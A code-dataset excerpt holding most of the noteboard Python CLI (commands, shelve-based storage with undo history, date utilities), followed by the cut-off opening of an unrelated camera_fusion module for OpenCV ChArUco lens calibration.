p(Fore.GREEN + str(ticks), Fore.LIGHTBLACK_EX + "done •", Fore.LIGHTRED_EX + str(marks), Fore.LIGHTBLACK_EX + "marked •", Fore.LIGHTYELLOW_EX + str(stars), Fore.LIGHTBLACK_EX + "starred")
def print_total():
with Storage() as s:
total = s.total
p(Fore.LIGHTCYAN_EX + "Total Items:", Style.DIM + str(total))
def run(args):
color = get_fore_color("run")
item = args.item
with Storage() as s:
i = s.get_item(item)
# Run
import subprocess
cmd = shlex.split(i["text"])
if "|" in cmd:
command = i["text"]
shell = True
elif len(cmd) == 1:
command = i["text"]
shell = True
else:
command = cmd
shell = False
execuatble = os.environ.get("SHELL", None)
process = subprocess.Popen(command, shell=shell, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, stdin=subprocess.PIPE, executable=execuatble)
# Live stdout output
deinit()
print(color + "[>] Running item" + Fore.RESET, Style.BRIGHT + str(i["id"]) + Style.RESET_ALL, color + "as command...\n" + Fore.RESET)
for line in iter(process.stdout.readline, b""):
sys.stdout.write(line.decode("utf-8"))
process.wait()
def add(args):
color = get_fore_color("add")
items = args.item
board = args.board
with Storage() as s:
print()
for item in items:
if not item:
error_print("Text must not be empty")
return
s.save_history()
i = s.add_item(board, item)
p(color + "[+] Added item", Style.BRIGHT + str(i["id"]), color + "to", Style.BRIGHT + (board or DEFAULT_BOARD))
s.write_history("add", "added item {} [{}] to board [{}]".format(str(i["id"]), item, (board or DEFAULT_BOARD)))
print_total()
print()
def remove(args):
color = get_fore_color("remove")
items = args.item
with Storage() as s:
print()
for item in items:
s.save_history()
i, board = s.remove_item(item)
p(color + "[-] Removed item", Style.BRIGHT + str(i["id"]), color + "on", Style.BRIGHT + board)
s.write_history("remove", "removed item {} [{}] from board [{}]".format(str(i["id"]), item, (board or DEFAULT_BOARD)))
print_total()
print()
def clear(args):
color = get_fore_color("clear")
boards = args.board
with Storage() as s:
print()
if boards:
for board in boards:
s.save_history()
amt = s.clear_board(board)
p(color + "[x] Cleared", Style.DIM + str(amt) + Style.RESET_ALL, color + "items on", Style.BRIGHT + board)
s.write_history("clear", "cleared {} items on board [{}]".format(str(amt), board))
else:
s.save_history()
amt = s.clear_board(None)
p(color + "[x] Cleared", Style.DIM + str(amt) + Style.RESET_ALL, color + "items on all boards")
s.write_history("clear", "cleared {} items on all board".format(str(amt)))
print_total()
print()
def tick(args):
color = get_fore_color("tick")
items = args.item
with Storage() as s:
print()
for item in items:
state = not s.get_item(item)["tick"]
s.save_history()
i = s.modify_item(item, "tick", state)
if state is True:
p(color + "[✓] Ticked item", Style.BRIGHT + str(i["id"]), color)
s.write_history("tick", "ticked item {} [{}]".format(str(i["id"]), i["text"]))
else:
p(color + "[✓] Unticked item", Style.BRIGHT + str(i["id"]), color)
s.write_history("untick", "unticked item {} [{}]".format(str(i["id"]), i["text"]))
print()
def mark(args):
color = get_fore_color("mark")
items = args.item
with Storage() as s:
print()
for item in items:
state = not s.get_item(item)["mark"]
s.save_history()
i = s.modify_item(item, "mark", state)
if state is True:
p(color + "[!] Marked item", Style.BRIGHT + str(i["id"]))
s.write_history("mark", "marked item {} [{}]".format(str(i["id"]), i["text"]))
else:
p(color + "[!] Unmarked item", Style.BRIGHT + str(i["id"]))
s.write_history("unmark", "unmarked item {} [{}]".format(str(i["id"]), i["text"]))
print()
def star(args):
color = get_fore_color("star")
items = args.item
with Storage() as s:
print()
for item in items:
state = not s.get_item(item)["star"]
s.save_history()
i = s.modify_item(item, "star", state)
if state is True:
p(color + "[*] Starred item", Style.BRIGHT + str(i["id"]))
s.write_history("star", "starred item {} [{}]".format(str(i["id"]), i["text"]))
else:
p(color + "[*] Unstarred item", Style.BRIGHT + str(i["id"]))
s.write_history("unstar", "unstarred item {} [{}]".format(str(i["id"]), i["text"]))
print()
def edit(args):
color = get_fore_color("edit")
item = args.item
text = (args.text or "").strip()
if text == "":
error_print("Text must not be empty")
return
with Storage() as s:
s.save_history()
i = s.modify_item(item, "text", text)
s.write_history("edit", "editted item {} from [{}] to [{}]".format(str(i["id"]), i["text"], text))
print()
p(color + "[~] Edited text of item", Style.BRIGHT + str(i["id"]), color + "from", i["text"], color + "to", text)
print()
def tag(args):
color = get_fore_color("tag")
items = args.item
text = (args.text or "").strip()
if len(text) > 10:
error_print("Tag text length should not be longer than 10 characters")
return
if text != "":
c = TAGS.get(text, "") or TAGS["default"]
tag_color = eval("Fore." + c.upper())
tag_text = text.replace(" ", "-")
else:
tag_text = ""
with Storage() as s:
print()
for item in items:
s.save_history()
i = s.modify_item(item, "tag", tag_text)
if text != "":
p(color + "[#] Tagged item", Style.BRIGHT + str(i["id"]), color + "with", tag_color + tag_text)
s.write_history("tag", "tagged item {} [{}] with tag text [{}]".format(str(i["id"]), i["text"], text))
else:
p(color + "[#] Untagged item", Style.BRIGHT + str(i["id"]))
s.write_history("tag", "untagged item {} [{}]".format(str(i["id"]), i["text"]))
print()
def due(args):
color = get_fore_color("due")
items = args.item
date = args.date or ""
if date and not re.match(r"\d+[d|w]", date):
error_print("Invalid date pattern format")
return
match = re.findall(r"\d+[d|w]", date)
if date:
days = 0
for m in match:
if m[-1] == "d":
days += int(m[:-1])
elif m[-1] == "w":
days += int(m[:-1]) * 7
duedate = add_date(days)
ts = to_timestamp(duedate)
else:
ts = None
with Storage() as s:
print()
for item in items:
s.save_history()
i = s.modify_item(item, "due", ts)
if ts:
p(color + "[:] Assigned due date", duedate, color + "to", Style.BRIGHT + str(item))
s.write_history("due", "assiged due date [{}] to item {} [{}]".format(duedate, str(i["id"]), i["text"]))
else:
p(color + "[:] Unassigned due date of item", Style.BRIGHT + str(item))
s.write_history("due", "unassiged due date of item {} [{}]".format(str(i["id"]), i["text"]))
print()
def move(args):
color = get_fore_color("move")
items = args.item
board = args.board
with Storage() as s:
print()
for item in items:
s.save_history()
i, b = s.move_item(item, board)
p(color + "[&] Moved item", Style.BRIGHT + str(i["id"]), color + "to", Style.BRIGHT + board)
s.write_history("move", "moved item {} [{}] from board [{}] to [{}]".format(str(i["id"]), i["text"], b, board))
print()
def rename(args):
color = get_fore_color("rename")
board = args.board
new = (args.new or "").strip()
if new == "":
error_print("Board name must not be empty")
return
with Storage() as s:
print()
s.get_board(board) # try to get -> to test existence of the board
s.save_history()
s.shelf[new] = s.shelf.pop(board)
p(color + "[~] Renamed", Style.BRIGHT + board, color + "to", Style.BRIGHT + new)
s.write_history("rename", "renamed board [{}] to [{}]".format(board, new))
print()
def undo(_):
color = get_fore_color("undo")
with Storage() as s:
all_hist = s.history.load()
hist = [i for i in all_hist if i["data"] is not None]
if len(hist) == 0:
error_print("Already at oldest change")
return
state = hist[-1]
print()
p(color + Style.BRIGHT + "Last Action:")
p("=>", get_fore_color(state["action"]) + state["info"])
print()
ask = input("[?] Continue (y/n) ? ")
if ask != "y":
error_print("Operation aborted")
return
s.history.revert()
print(color + "[^] Undone", "=>", get_fore_color(state["action"]) + state["info"])
def import_(args):
color = get_fore_color("import")
path = args.path
with Storage() as s:
s.save_history()
full_path = s.import_(path)
s.write_history("import", "imported boards from [{}]".format(full_path))
print()
p(color + "[I] Imported boards from", Style.BRIGHT + full_path)
print_total()
print()
def export(args):
color = get_fore_color("export")
dest = args.dest
path = os.path.abspath(os.path.expanduser(dest))
if os.path.isfile(path):
print("[i] File {} already exists".format(path))
ask = input("[?] Overwrite (y/n) ? ")
if ask != "y":
error_print("Operation aborted")
return
with Storage() as s:
full_path = s.export(path)
s.write_history("export", "exported boards to [{}]".format(full_path))
print()
p(color + "[E] Exported boards to", Style.BRIGHT + full_path)
print()
def history(_):
hist = History.load()
for action in hist:
name = action["action"]
info = action["info"]
date = action["date"]
print(Fore.LIGHTYELLOW_EX + date, get_back_color(name) + Fore.BLACK + name.upper().center(9), info)
def display_board(shelf, date=False, timeline=False):
# print initial help message
if not shelf:
print()
c = "`board --help`"
p(Style.BRIGHT + "Type", Style.BRIGHT + Fore.YELLOW + c, Style.BRIGHT + "to get started")
for board in shelf:
# Print Board title
if len(shelf[board]) == 0:
continue
print()
p("\033[4m" + Style.BRIGHT + board, Fore.LIGHTBLACK_EX + "[{}]".format(len(shelf[board])))
# Print Item
for item in shelf[board]:
mark = Fore.BLUE + "●"
text_color = ""
tag_text = ""
# tick
if item["tick"] is True:
mark = Fore.GREEN + "✔"
text_color = Fore.LIGHTBLACK_EX
# mark
if item["mark"] is True:
if item["tick"] is False:
mark = Fore.LIGHTRED_EX + "!"
text_color = Style.BRIGHT + Fore.RED
# tag
if item["tag"]:
c = TAGS.get(item["tag"], "") or TAGS["default"]
tag_color = eval("Fore." + c.upper())
tag_text = " " + tag_color + "(" + item["tag"] + ")"
# Star
star = " "
if item["star"] is True:
star = Fore.LIGHTYELLOW_EX + "⭑"
# Day difference
days = time_diff(item["time"]).days
if days <= 0:
day_text = ""
else:
day_text = Fore.LIGHTBLACK_EX + "{}d".format(days)
# Due date
due_text = ""
color = ""
if item["due"]:
due_days = time_diff(item["due"], reverse=True).days + 1 # + 1 because today is included
if due_days == 0:
text = "today"
color = Fore.RED
elif due_days == 1:
text = "tomorrow"
color = Fore.YELLOW
elif due_days == -1:
text = "yesterday"
color = Fore.BLUE
elif due_days < 0:
text = "{}d ago".format(due_days*-1)
elif due_days > 0:
text = "{}d".format(due_days)
due_text = "{}(due: {}{})".format(Fore.LIGHTBLACK_EX, color + text, Style.RESET_ALL + Fore.LIGHTBLACK_EX)
# print text all together
if date is True and timeline is False:
p(star, Fore.LIGHTMAGENTA_EX + str(item["id"]).rjust(2), mark, text_color + item["text"], tag_text, Fore.LIGHTBLACK_EX + str(item["date"]),
(Fore.LIGHTBLACK_EX + "(due: {})".format(color + str(to_datetime(item["due"])) + Fore.LIGHTBLACK_EX)) if item["due"] else "")
else:
p(star, Fore.LIGHTMAGENTA_EX + str(item["id"]).rjust(2), mark, text_color + item["text"] + (Style.RESET_ALL + Fore.LIGHTBLUE_EX + " @" + item["board"] if timeline else ""),
tag_text, day_text, due_text)
print()
print_footer()
print_total()
print()
def main():
description = (Style.BRIGHT + " \033[4mNoteboard" + Style.RESET_ALL + " lets you manage your " + Fore.YELLOW + "notes" + Fore.RESET + " & " + Fore.CYAN + "tasks" + Fore.RESET
+ " in a " + Fore.LIGHTMAGENTA_EX + "tidy" + Fore.RESET + " and " + Fore.LIGHTMAGENTA_EX + "fancy" + Fore.RESET + " way.")
epilog = \
"""
Examples:
$ board add "improve cli" -b "Todo List"
$ board remove 2 4
$ board clear "Todo List" "Coding"
$ board edit 1 "improve cli"
$ board tag 1 6 -t "enhancement" -c GREEN
$ board tick 1 5 9
$ board move 2 3 -b "Destination"
$ board import ~/Documents/board.json
$ board export ~/Documents/save.json
{0}Made with {1}\u2764{2} by a1phat0ny{3} (https://github.com/a1phat0ny/noteboard)
""".format(Style.BRIGHT, Fore.RED, Fore.RESET, Style.RESET_ALL)
parser = argparse.ArgumentParser(
prog="board",
description=description,
epilog=epilog,
formatter_class=argparse.RawTextHelpFormatter
)
parser._positionals.title = "Actions"
parser._optionals.title = "Options"
parser.add_argument("--version", action="version", version="noteboard " + __version__)
parser.add_argument("-d", "--date", help="show boards with the added date of every item", default=False, action="store_true", dest="d")
parser.add_argument("-s", "--sort", help="show boards with items on each board sorted alphabetically", default=False, action="store_true", dest="s")
parser.add_argument("-t", "--timeline", help="show boards in timeline view, ignore the -d/--date option", default=False, action="store_true", dest="t")
subparsers = parser.add_subparsers()
add_parser = subparsers.add_parser("add", help=get_fore_color("add") + "[+] Add an item to a board" + Fore.RESET)
add_parser.add_argument("item", help="the item you want to add", type=str, metavar="<item text>", nargs="+")
add_parser.add_argument("-b", "--board", help="the board you want to add the item to (default: {})".format(DEFAULT_BOARD), type=str, metavar="<name>")
add_parser.set_defaults(func=add)
remove_parser = subparsers.add_parser("remove", help=get_fore_color("remove") + "[-] Remove items" + Fore.RESET)
remove_parser.add_argument("item", help="id of the item you want to remove", type=int, metavar="<item id>", nargs="+")
remove_parser.set_defaults(func=remove)
clear_parser = subparsers.add_parser("clear", help=get_fore_color("clear") + "[x] Clear all items on a/all board(s)" + Fore.RESET)
clear_parser.add_argument("board", help="clear this specific board", type=str, metavar="<name>", nargs="*")
clear_parser.set_defaults(func=clear)
tick_parser = subparsers.add_parser("tick", help=get_fore_color("tick") + "[✓] Tick/Untick an item" + Fore.RESET)
tick_parser.add_argument("item", help="id of the item you want to tick/untick", type=int, metavar="<item id>", nargs="+")
tick_parser.set_defaults(func=tick)
mark_parser = subparsers.add_parser("mark", help=get_fore_color("mark") + "[!] Mark/Unmark an item" + Fore.RESET)
mark_parser.add_argument("item", help="id of the item you want to mark/unmark", type=int, metavar="<item id>", nargs="+")
mark_parser.set_defaults(func=mark)
star_parser = subparsers.add_parser("star", help=get_fore_color("star") + "[*] Star/Unstar an item" + Fore.RESET)
star_parser.add_argument("item", help="id of the item you want to star/unstar", type=int, metavar="<item id>", nargs="+")
star_parser.set_defaults(func=star)
edit_parser = subparsers.add_parser("edit", help=get_fore_color("edit") + "[~] Edit the text of an item" + Fore.RESET)
edit_parser.add_argument("item", help="id of the item you want to edit", type=int, metavar="<item id>")
edit_parser.add_argument("text", help="new text to replace the old one", type=str, metavar="<new text>")
edit_parser.set_defaults(func=edit)
tag_parser = subparsers.add_parser("tag", help=get_fore_color("tag") + "[#] Tag an item with text" + Fore.RESET)
tag_parser.add_argument("item", help="id of the item you want to tag", type=int, metavar="<item id>", nargs="+")
tag_parser.add_argument("-t", "--text", help="text of tag (do not specify this argument to untag)", type=str, metavar="<tag text>")
tag_parser.set_defaults(func=tag)
due_parser = subparsers.add_parser("due", help=get_fore_color("due") + "[:] Assign a due date to an item" + Fore.RESET)
due_parser.add_argument("item", help="id of the item", type=int, metavar="<item id>", nargs="+")
due_parser.add_argument("-d", "--date", help="due date of the item in the format of `<digit><d|w>` e.g. '1w4d' for 1 week and 4 days (11 days)", type=str, metavar="<due date>")
due_parser.set_defaults(func=due)
run_parser = subparsers.add_parser("run", help=get_fore_color("run") + "[>] Run an item as command" + Fore.RESET)
run_parser.add_argument("item", help="id of the item you want to run", type=int, metavar="<item id>")
run_parser.set_defaults(func=run)
move_parser = subparsers.add_parser("move", help=get_fore_color("move") + "[&] Move an item to another board" + Fore.RESET)
move_parser.add_argument("item", help="id of the item you want to move", type=int, metavar="<item id>", nargs="+")
move_parser.add_argument("-b", "--board", help="name of the destination board", type=str, metavar="<name>", required=True)
move_parser.set_defaults(func=move)
rename_parser = subparsers.add_parser("rename", help=get_fore_color("rename") + "[~] Rename the name of the board" + Fore.RESET)
rename_parser.add_argument("board", help="name of the board you want to rename", type=str, metavar="<name>")
rename_parser.add_argument("new", help="new name to replace the old one", type=str, metavar="<new name>")
rename_parser.set_defaults(func=rename)
undo_parser = subparsers.add_parser("undo", help=get_fore_color("undo") + "[^] Undo the last action" + Fore.RESET)
undo_parser.set_defaults(func=undo)
import_parser = subparsers.add_parser("import", help=get_fore_color("import") + "[I] Import and load boards from JSON file" + Fore.RESET)
import_parser.add_argument("path", help="path to the target import file", type=str, metavar="<path>")
import_parser.set_defaults(func=import_)
export_parser = subparsers.add_parser("export", help=get_fore_color("export") + "[E] Export boards as a JSON file" + Fore.RESET)
export_parser.add_argument("-d", "--dest", help="destination of the exported file (default: ./board.json)", type=str, default="./board.json", metavar="<destination path>")
export_parser.set_defaults(func=export)
history_parser = subparsers.add_parser("history", help="[.] Prints out the historical changes")
history_parser.set_defaults(func=history)
args = parser.parse_args()
init(autoreset=True)
try:
args.func
except AttributeError:
with Storage() as s:
shelf = dict(s.shelf)
if args.s:
# sort alphabetically
for board in shelf:
shelf[board] = sorted(shelf[board], key=lambda x: x["text"].lower())
elif args.d:
# sort by date
for board in shelf:
shelf[board] = sorted(shelf[board], key=lambda x: x["time"], reverse=True)
if args.t:
data = {}
for board in shelf:
for item in shelf[board]:
if item["date"]:
if item["date"] not in data:
data[item["date"]] = []
item.update({"board": board})
data[item["date"]].append(item)
shelf = data
display_board(shelf, date=args.d, timeline=args.t)
else:
try:
args.func(args)
except KeyboardInterrupt:
error_print("Operation aborted")
except NoteboardException as e:
error_print(str(e))
logger.debug("(ERROR)", exc_info=True)
except Exception as e:
error_print(str(e))
logger.debug("(ERROR)", exc_info=True)
deinit()
```
#### File: noteboard/noteboard/storage.py
```python
import shelve
import gzip
import shutil
import json
import os
import logging
from . import DIR_PATH, HISTORY_PATH, STORAGE_PATH, STORAGE_GZ_PATH, DEFAULT_BOARD
from .utils import get_time, to_datetime
logger = logging.getLogger("noteboard")
class NoteboardException(Exception):
"""Base Exception Class of Noteboard."""
class ItemNotFoundError(NoteboardException):
"""Raised when no item with the specified id found."""
def __init__(self, id):
self.id = id
def __str__(self):
return "Item {} not found".format(self.id)
class BoardNotFoundError(NoteboardException):
"""Raised when no board with specified name found."""
def __init__(self, name):
self.name = name
def __str__(self):
return "Board '{}' not found".format(self.name)
class History:
def __init__(self, storage):
self.storage = storage
self.buffer = None
@staticmethod
def load():
try:
with gzip.open(HISTORY_PATH, "r") as j:
history = json.loads(j.read().decode("utf-8"))
except FileNotFoundError:
raise NoteboardException("History file not found for loading")
return history
def revert(self):
history = History.load()
hist = [i for i in history if i["data"] is not None]
if len(hist) == 0:
return {}
state = hist[-1]
logger.debug("Revert state: {}".format(state))
# Update the shelf
self.storage.shelf.clear()
self.storage.shelf.update(dict(state["data"]))
# Remove state from history
history.remove(state)
# Update the history file
with gzip.open(HISTORY_PATH, "w") as j:
j.write(json.dumps(history).encode("utf-8"))
return state
def save(self, data):
self.buffer = data.copy()
def write(self, action, info):
is_new = not os.path.isfile(HISTORY_PATH)
# Create and initialise history file with an empty list
if is_new:
with gzip.open(HISTORY_PATH, "w+") as j:
j.write(json.dumps([]).encode("utf-8"))
# Write data to disk
# => read the current saved states
history = History.load()
# => dump history data
state = {"action": action, "info": info, "date": get_time("%d %b %Y %X")[0], "data": dict(self.buffer) if self.buffer else self.buffer}
logger.debug("Write history: {}".format(state))
history.append(state)
with gzip.open(HISTORY_PATH, "w") as j:
j.write(json.dumps(history).encode("utf-8"))
self.buffer = None # empty the buffer
class Storage:
def __init__(self):
self._shelf = None
self.history = History(self)
def __enter__(self):
self.open()
return self
def __exit__(self, *args, **kwargs):
self.close()
return False
def open(self):
# Open shelf
if self._shelf is not None:
raise NoteboardException("Shelf object has already been opened.")
if not os.path.isdir(DIR_PATH):
logger.debug("Making directory {} ...".format(DIR_PATH))
os.mkdir(DIR_PATH)
if os.path.isfile(STORAGE_GZ_PATH):
# decompress compressed storage.gz to a storage file
with gzip.open(STORAGE_GZ_PATH, "rb") as f_in:
with open(STORAGE_PATH, "wb") as f_out:
shutil.copyfileobj(f_in, f_out)
os.remove(STORAGE_GZ_PATH)
self._shelf = shelve.open(STORAGE_PATH, "c", writeback=True)
def close(self):
if self._shelf is None:
raise NoteboardException("No opened shelf object to be closed.")
# Cleanup
for board in self.shelf:
# remove empty boards
if not self.shelf[board]:
self.shelf.pop(board)
continue
# always sort items on the boards before closing
self.shelf[board] = list(sorted(self.shelf[board], key=lambda x: x["id"]))
self._shelf.close()
# compress storage to storage.gz
with gzip.open(STORAGE_GZ_PATH, "wb") as f_out:
with open(STORAGE_PATH, "rb") as f_in:
shutil.copyfileobj(f_in, f_out)
os.remove(STORAGE_PATH)
@property
def shelf(self):
"""Use this property to access the shelf object from the outside."""
if self._shelf is None:
raise NoteboardException("No opened shelf object to be accessed.")
return self._shelf
@property
def boards(self):
"""Get all existing board titles."""
return list(self.shelf.keys())
@property
def items(self):
"""Get all existing items with ids and texts."""
results = {}
for board in self.shelf:
for item in self.shelf[board]:
results[item["id"]] = item["text"]
return results
@property
def total(self):
"""Get the total amount of items in all boards."""
return len(self.items)
def get_item(self, id):
"""Get the item with the give ID. ItemNotFoundError will be raised if nothing found."""
for board in self.shelf:
for item in self.shelf[board]:
if item["id"] == id:
return item
raise ItemNotFoundError(id)
def get_board(self, name):
"""Get the board with the given name. BoardNotFound will be raised if nothing found."""
for board in self.shelf:
if board == name:
return self.shelf[name]
raise BoardNotFoundError(name)
def get_all_items(self):
items = []
for board in self.shelf:
for item in self.shelf[board]:
items.append(item)
return items
def _add_board(self, board):
if board.strip() == "":
raise ValueError("Board title must not be empty.")
if board in self.shelf.keys():
raise KeyError("Board already exists.")
logger.debug("Added Board: '{}'".format(board))
self.shelf[board] = [] # register board by adding an empty list
def _add_item(self, id, board, text):
date, timestamp = get_time()
payload = {
"id": id, # int
"text": text, # str
"time": timestamp, # int
"date": date, # str
"due": None, # int
"tick": False, # bool
"mark": False, # bool
"star": False, # bool
"tag": "" # str
}
self.shelf[board].append(payload)
logger.debug("Added Item: {} to Board: '{}'".format(json.dumps(payload), board))
return payload
def add_item(self, board, text):
"""[Action]
* Can be Undone: Yes
Prepare data to be dumped into the shelf.
If the specified board not found, it automatically creates and initialise a new board.
This method passes the prepared dictionary data to self._add_item to encrypt it and really add it to the board.
Returns:
dict -- data of the added item
"""
current_id = 1
# get all existing ids
ids = list(sorted(self.items.keys()))
if ids:
current_id = ids[-1] + 1
# board name
board = board or DEFAULT_BOARD
# add
if board not in self.shelf:
# create board
self._add_board(board)
# add item
return self._add_item(current_id, board, text)
def remove_item(self, id):
"""[Action]
* Can be Undone: Yes
Remove an existing item from board.
Returns:
dict -- data of the removed item
str -- board name of the regarding board of the removed item
"""
status = False
for board in self.shelf:
for item in self.shelf[board]:
if item["id"] == id:
# remove
self.shelf[board].remove(item)
removed = item
board_of_removed = board
logger.debug("Removed Item: {} on Board: '{}'".format(json.dumps(item), board))
status = True
if len(self.shelf[board]) == 0:
del self.shelf[board]
if status is False:
raise ItemNotFoundError(id)
return removed, board_of_removed
def clear_board(self, board=None):
"""[Action]
* Can be Undone: Yes
Remove all items of a board or of all boards (if no board is specified).
Returns:
int -- total amount of items removed
"""
if not board:
amt = len(self.items)
# remove all items of all boards
self.shelf.clear()
logger.debug("Cleared all {} Items".format(amt))
else:
# remove
if board not in self.shelf:
raise BoardNotFoundError(board)
amt = len(self.shelf[board])
del self.shelf[board]
logger.debug("Cleared {} Items on Board: '{}'".format(amt, board))
return amt
def modify_item(self, id, key, value):
"""[Action]
* Can be Undone: Partially (only when modifying text)
Modify the data of an item, given its ID.
If the item does not have the key, one will be created.
Arguments:
id {int} -- id of the item you want to modify
key {str} -- one of [id, text, time, tick, star, mark, tag]
value -- new value to replace the old value
Returns:
dict -- the item before modification
"""
item = self.get_item(id)
old = item.copy()
item[key] = value
logger.debug("Modified Item from {} to {}".format(json.dumps(old), json.dumps(item)))
return old
def move_item(self, id, board):
"""[Action]
* Can be undone: No
Move the whole item to the destination board, given the id of the item and the name of the board.
If the destination board does not exist, one will be created.
Arguments:
id {int} -- id of the item you want to move
board {str} -- name of the destination board
Returns:
item {dict} -- the item that is moved
b {str} -- the name of board the item originally from
"""
for b in self.shelf:
for item in self.shelf[b]:
if item["id"] == id:
if not self.shelf.get(board):
# register board with a empty list if board not found
self.shelf[board] = []
# append to dest board `board`
self.shelf[board].append(item)
# remove from the current board `b`
self.shelf[b].remove(item)
return item, b
raise ItemNotFoundError(id)
@staticmethod
def _validate_json(data):
keys = ["id", "text", "time", "date", "due", "tick", "mark", "star", "tag"]
for board in data:
if board.strip() == "":
return False
# Check for board type (list)
if not isinstance(data[board], list):
return False
for item in data[board]:
# Check for item type (dictionary)
if not isinstance(item, dict):
return False
# Check for existence of keys
for key in keys:
if key not in item.keys():
return False
# Automatically make one from supplied timestamp if date is not supplied
if not item["date"] and item["time"]:
item["date"] = to_datetime(float(item["time"])).strftime("%a %d %b %Y")
return True
def import_(self, path):
"""[Action]
* Can be Undone: Yes
Import and load a local file (json) and overwrite the current boards.
Arguments:
path {str} -- path to the archive file
Returns:
path {str} -- full path of the imported file
"""
path = os.path.abspath(path)
try:
with open(path, "r") as f:
data = json.load(f)
except FileNotFoundError:
raise NoteboardException("File not found ({})".format(path))
except json.JSONDecodeError:
raise NoteboardException("Failed to decode JSON")
else:
if self._validate_json(data) is False:
raise NoteboardException("Invalid JSON structure for noteboard")
# Overwrite the current shelf and update it
self.shelf.clear()
self.shelf.update(dict(data))
return path
def export(self, dest="./board.json"):
"""[Action]
* Can be Undone: No
Exoport the current shelf as a JSON file to `dest`.
Arguments:
dest {str} -- path of the destination
Returns:
path {str} -- full path of the exported file
"""
dest = os.path.abspath(dest)
data = dict(self.shelf)
with open(dest, "w") as f:
json.dump(data, f, indent=4, sort_keys=True)
return dest
def save_history(self):
data = {}
for board in self.shelf:
data[board] = []
for item in self.shelf[board]:
data[board].append(item.copy())
self.history.save(data)
def write_history(self, action, info):
self.history.write(action, info)
```
#### File: noteboard/noteboard/utils.py
```python
import time
import datetime
import os
import json
import logging
DEFAULT = {
"StoragePath": "~/.noteboard/",
"DefaultBoardName": "Board",
"Tags": {
"default": "BLUE",
}
}
def get_time(fmt=None):
if fmt:
date = datetime.datetime.now().strftime(fmt) # str
else:
date = datetime.datetime.now().strftime("%a %d %b %Y") # str
timestamp = time.time()
return date, timestamp
def to_timestamp(date):
return int(time.mktime(date.timetuple()))
def to_datetime(ts):
return datetime.date.fromtimestamp(ts) # datetime instance
def time_diff(ts, reverse=False):
"""Get the time difference between the given timestamp and the current time."""
date = datetime.datetime.fromtimestamp(ts)
now = datetime.datetime.fromtimestamp(get_time()[1])
if reverse:
return date - now # datetime instance
return now - date # datetime instance
def add_date(days):
"""Get the datetime with `days` added to the current datetime."""
today = datetime.date.today()
date = today + datetime.timedelta(days=days)
return date # datetime instance
def setup_logger(path):
formatter = logging.Formatter("%(asctime)s [%(levelname)s] (%(funcName)s in %(filename)s) %(message)s", "")
handler = logging.FileHandler(path, mode="a+")
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
logger = logging.getLogger("noteboard")
logger.setLevel(logging.DEBUG)
if not logger.hasHandlers():
logger.addHandler(handler)
return logger
def init_config(path):
"""Initialise configurations file. If file already exists, it will be overwritten."""
with open(path, "w+") as f:
json.dump(DEFAULT, f, sort_keys=True, indent=4)
def load_config(path):
"""Load configurations file. If file does not exist, call `init_config()`."""
if not os.path.isfile(path):
init_config(path)
with open(path, "r+") as f:
config = json.load(f)
return config
``` |
{
"source": "a1rb4Ck/camera_fusion",
"score": 3
} |
#### File: camera_fusion/camera_fusion/CameraCorrected.py
```python
from .Camera import Camera
from pathlib import Path
import numpy as np
from threading import Event, Thread
import time
import subprocess
import os
import sys
try:
import cv2
from cv2 import aruco
except ImportError:
raise ImportError('ERROR opencv-contrib-python must be installed!')
# TODO: implement height transform correction
# https://github.com/O-C-R/maproom-robots/tree/master/skycam
# TODO: AR example
# https://github.com/avmeer/ComputerVisionAugmentedReality
# Averaging
# ○ ArUco tags are hard to pick out perfectly each time
# ○ Position of the marker is noisy and subsequently the models would shake
# ○ Averaging the last three position matrices helped to stabilize the models.
def input_float(prompt=''):
"""Ask for a human float input.
Args:
prompt (string): Text to prompt as input.
"""
# try:
# return raw_input(prompt)
# except NameError:
# return input(prompt)
while True:
try:
float_input = float(input(prompt))
except ValueError:
print('Please enter a float.\n')
continue
else:
break
return float_input
class CameraCorrected(Camera):
"""CameraCorrected class used to setup and use a camera with lens correction.
Attributes:
aruco_dict_num (int): ChAruco dictionnary number used for calibr.
board (CharucoBoard): ChAruco board object used for calibration.
cap (VideoCapture): OpenCV VideoCapture element.
cam_id (string): Camera or V4L id (ex: /dev/video0 /dev/v4l_by_id/...).
charuco_marker_size (float): black square length on the printed board.
charuco_square_length (float): Aruco marker length on the print.
focus (float): Camera focus value for camera which supports focusing.
height (int): Camera frame height in pixels.
width (int): Camera frame width in pixels.
camera_matrix (OpenCV matrix): OpenCV camera correction matrix.
dist_coeffs (OpenCV matrix): OpenCV distance correction coefficients.
corners (list): List of detected corners positions as a buffer.
ids (list): List of detected corners ids as a buffer.
board_post (PostureBuffer): Buffer to filter the posture of the board.
settings (list): List of OpenCV VideoCapture (v4l) settings.
thread_ready (Event): Thread is ready Event.
thread (threading.Thread): VideoCapture reading thread.
t0 (time.time): Time counter buffer.
"""
def __init__(self, cam_id, aruco_dict_num, focus=None, vertical_flip=None,
settings=None):
"""Initialize the CameraCorrected object variables.
Args:
cam_id (string): Camera or V4L id.
aruco_dict_num (int): ChAruco dictionnary number used for calibr.
vertical_flip (bool): Trigger vertical frame flipping.
focus (float): Camera focus value for camera which supports focus.
settings (list): list of tuple with specific camera settings.
"""
Camera.__init__(self, cam_id, vertical_flip, settings)
self.focus = focus
# Corners points and identifiers buffers
self.aruco_dict_num = aruco_dict_num
self.corners = None
self.ids = None
# Moving/Rolling average posture filtering
# TODO: Low pass filtering on translation and rotation
self.board_post = PostureBuffer()
# Parameter files folder
if not Path('./data').exists():
os.makedirs('./data')
def initialize(self):
"""Set up camera and launch the calibration routine."""
self._setup()
# Camera correction
self.calibrate_camera_correction()
# Start the VideoCapture read() thread
self.stop = False
self.start_camera_thread()
self.thread_ready.wait()
# Quick test
self.test_camera()
print('Corrected camera %s initialization done!\n' % self.cam_id)
def calibrate_camera_correction(self):
"""Calibrate the camera lens correction."""
# Hints:
# https://github.com/opencv/opencv/blob/master/samples/python/calibrate.py
# https://longervision.github.io/2017/03/16/OpenCV/opencv-internal-calibration-chessboard/
# http://www.peterklemperer.com/blog/2017/10/29/opencv-charuco-camera-calibration/
# http://www.morethantechnical.com/2017/11/17/projector-camera-calibration-the-easy-way/
# https://mecaruco2.readthedocs.io/en/latest/notebooks_rst/Aruco/sandbox/ludovic/aruco_calibration_rotation.html
defaultConfig_path = Path('./data/defaultConfig.xml')
if defaultConfig_path.exists():
print(' Found defaultConfig.xml.\nCAUTION: be sure settings in d'
'efaultConfig.xml match the current hardware configuration.')
default_config = cv2.FileStorage(
